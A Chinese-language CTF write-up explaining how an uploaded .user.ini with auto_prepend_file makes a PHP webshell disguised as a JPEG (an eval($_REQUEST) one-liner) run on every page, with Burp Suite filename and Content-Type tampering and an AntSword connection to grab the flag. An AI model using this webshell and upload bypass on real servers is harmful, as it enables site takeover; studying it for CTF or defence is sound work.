CTF之文件上传(.user.ini)

.user.ini 本身不是漏洞,但它经常被攻击者利用来实施攻击,属于配置滥用或权限提升类型的安全问题。

具体的攻击手法:

攻击者最常利用的是 auto_prepend_fileauto_append_file 这两个指令。

攻击步骤:

  1. 找到入口:攻击者先通过其他漏洞(如程序漏洞、弱密码等)获得在网站目录上传文件的权限。

  2. 上传恶意文件 :上传一个包含后门代码的图片或文本文件,比如 evil.jpg,内容其实是 <?php @eval($_REQUEST['cmd']); ?>

  3. 创建或修改.user.ini :在上传目录创建或修改 .user.ini 文件,内容为:

  4. auto_prepend_file = evil.jpg

  5. 后果 :现在该目录下的每一个PHP文件在执行时,都会自动先执行 evil.jpg 中的恶意代码,攻击者就获得了整个目录的控制权。


CTF之文件上传:利用.user.ini文件获取控制权限

1.看到这个题目,就知道要上传图片来获取权限

2.这时我构造了一个带有恶意代码的图片文件,命名为a.jpg,但是直接上传是不可能获取权限的,服务器看到.jpg, .txt, .html这些扩展名,会认为它们是静态文件(图片、文本、网页),它会直接读取文件的内容,并发送给浏览器,不会调用 PHP 解释器。

这时.user.ini配置文件就起作用了,PHP 解释器开始工作前,先读取并应用了目录下的.user.ini配置文件,利用.user.ini的 auto_prepend_file 指令,将一个本不会被执行的图片木马(a.jpg)变成在每个 PHP 文件执行前都会自动运行的前置文件,从而劫持整个目录的执行流程。它先要去执行a.jpg 文件,虽然 a.jpg扩展名是 .jpg,但此时它是在 PHP 解释器内部被包含的,PHP 解释器不在乎文件扩展名,它只认文件内容里的 <?php ?> 标签。于是,它成功地执行了a.jpg里的后门代码 eval($_REQUEST['a'])。(a是下面蚁剑连接网站的参数)

3.因为系统无法将文件命名为.user.ini,只能暂时命名为user.ini,所以需要burpsuite拦截请求,将文件名改为.user.ini,并且将Content-type改为image/jpg类型才能被上传。

这时.user.ini就上传成功了

而a.jpg本来就是image/jpg类型,肯定能直接上传

4.蚁剑连接http://61.147.171.35:53191/uploads/index.php(不是直接连接 a.jpg,而是连接一个该目录下肯定存在的正常 PHP 文件(index.php)),并设置参数为a(这个密码对应木马代码中的 $_REQUEST['a'] 的参数名)。

连接时

  1. (1)当你点击"测试连接"时,蚁剑向 http://61.147.171.35:53191/uploads/index.php 发送一个 HTTP 请求。

  2. (2)服务器准备执行 /uploads/index.php

  3. (3)在执行前,PHP 引擎读取并应用了 /uploads/ 目录下的 .user.ini 设置。根据 auto_prepend_file=a.jpg 指令,PHP 引擎首先去包含并执行 a.jpg 文件。PHP 解释器会解析 a.jpg 中的 <?php ... ?> 标签,于是 eval($_REQUEST['a']) 这行代码被执行。

  4. (5)此时,蚁剑发送的请求中正好携带了参数 a,其值是一段经过 Base64 编码的、用于测试连接的 PHP 代码(比如执行系统命令,列出当前目录的所有文件和详细信息)。eval 函数执行了这段代码,并将结果返回给蚁剑。

  5. (6)蚁剑收到响应,确认后门生效,显示"连接成功"。

获取权限后的操作

  1. 连接成功后,蚁剑的界面(如截图所示)就变成了一个可视化的文件管理器。可以像操作本地文件夹一样,浏览服务器上的文件,最终找到并打开 /flag 文件,获取到flag内容,完成题目。
相关推荐
雪兽软件11 分钟前
SaaS 安全是什么以及如何管理风险
网络·安全
white-persist32 分钟前
CSRF 漏洞全解析:从原理到实战
网络·python·安全·web安全·网络安全·系统安全·csrf
samroom42 分钟前
iframe实战:跨域通信与安全隔离
前端·安全
渗透测试老鸟-九青1 小时前
网络安全之揭秘APT Discord C2 以及如何取证
安全·web安全·网络安全学习路线
隐语SecretFlow1 小时前
【隐语SecretFlow用户案例】亚信科技构建统一隐私计算框架探索实践
科技·算法·安全·隐私计算·隐私求交·开源隐私计算
Freshman小白1 小时前
实验室安全准入考试答案
安全·网课答案
荣光波比2 小时前
K8S(十二)—— Kubernetes安全机制深度解析与实践:从认证到RBAC授权
安全·容器·kubernetes
Guheyunyi4 小时前
风险感知中枢:监测预警系统的架构与核心
大数据·运维·安全·重构·架构·自动化
lingggggaaaa7 小时前
小迪安全v2023学习笔记(一百三十四讲)—— Windows权限提升篇&数据库篇&MySQL&MSSQL&Oracle&自动化项目
java·数据库·windows·笔记·学习·安全·网络安全
FreeBuf_9 小时前
Spring两大漏洞可导致泄露敏感信息及安全防护绕过(CVE-2025-41253/41254)
java·安全·spring